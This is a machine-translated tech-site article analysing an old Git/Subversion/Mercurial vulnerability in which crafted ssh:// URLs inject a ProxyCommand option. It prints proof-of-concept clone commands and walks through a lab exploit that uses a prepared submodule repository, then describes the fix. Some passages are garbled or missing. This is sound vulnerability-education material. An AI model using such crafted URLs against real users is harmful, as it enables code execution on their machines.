Shulou(Shulou.com)05/31 Report--

Xiaobian to share with you malicious SSH links lead to command execution vulnerability example analysis, I believe most people do not know how to share this article for your reference, I hope you read this article after a lot of gains, let us go to understand it!

I. Introduction to loopholes

Some time ago, three mainstream source version control systems, Git, Subversion (svn), and Mercurial, released updated patches to fix a client code execution vulnerability. A malicious attacker could send a crafted ssh:// URL link to the victim, which when accessed could trigger the vulnerability leading to malicious code execution. The vulnerability was discovered and reported by Brian Neel of GitLab, Joan Schneeweiss of Recurity Labs, and Jeff King of GitHub. Details are as follows:

Bug Number:

Git: CVE-2017-1000117Apache Subversion: CVE-2017-9800Mercurial: CVE-2017-1000116

The attacker sends a crafted URL link to the victim,"ssh://…", which, if accessed by the victim, causes malicious instructions to execute on the client, thereby gaining host privileges. Exploiting Conditions and Methods: Combining Social Engineering with Remote Phishing

Vulnerability Impact Scope:

Git：

Git args，

Then get the ssh_host part of the url and splice the path,

Finally, the start_command function is called to execute the command.

start_command is defined in git/run-command.c

int start_command(struct child_process *cmd)

The cmd parameter passed in is processed and assigned to argv:

The command is executed via execute. But in this case the command execution is "/usr/bin/ssh `ssh_host` path" and the-o argument of the ssh command is partly executable:

For example:

ssh -oProxyCommand=gnome-calculator xxx

GNome's calculator will be opened locally.

So if we specify the connection as:

git clone ssh://-oProxyCommand=gnome-calculator/cert

The same command execution effect will be achieved.

III. Exploiting vulnerabilities

The project address we prepared for you in the experimental environment is as follows:

http://172.16.12.2:8080/root/CVE-2017-1000117

Predefined commands included in the project are listed in CVE-2017-1000117/payload: id > /var/www/html/vuls:

To check the native GIT version, use the git --version command:

As we can see above, the native git version is not up to date, and it is possible that this vulnerability exists.

In order to verify whether the payload is executed successfully, we must ensure that the directory/var/www/html in the payload exists locally. If not, please create (mkdir /var/www/html) first. This directory is only used for vulnerability verification:

Then we execute the following command clone project (the actual exploitation scenario may be caused by malicious people using social engineering fraud):

git clone --recurse-submodules "http://172.16.12.2:8080/root/CVE-2017-1000117.git"

As shown in the above figure, there may be errors, but it does not affect the download of the project and the execution of malicious commands:

We use ls -al CVE-2017-1000117 to see where the project was downloaded:

As can be seen above, the project was successfully downloaded.

So, is the predefined command id > /var/www/html/vuls executed in the project? We use ls -al /var/www/html/vuls command to verify whether the file is generated:

As above, the file was successfully generated.

Use the cat command to view the file and see the results of the command execution:

As you can see above, the predefined commands in the project were successfully executed.

IV. Bug fixing

Git officials have fixed the vulnerability. In v2.14.1 commit, you can see that ssh_host is validated before execution in the git_connect function:

Verify that the content is new to this function:

This function checks the first character of ssh_host to prevent "-" from passing arguments to ssh

And in many places on the incoming host, port have done the function filter.

Users only need to check whether they are using the affected version, and if so, upgrade Git.

Bug fixing recommendations

Git： Upgrade to Git v2.14.1 Apache Subversion: Upgrade to Subversion 1.8.19, Subversion 1.9.7 Mercurial: Upgrade to Mercurial 4.3 and 4.2.3. Above is "Example analysis of malicious SSH links leading to command execution vulnerabilities" All the contents of this article, thank you for reading! I believe that everyone has a certain understanding, hope to share the content to help everyone, if you still want to learn more knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.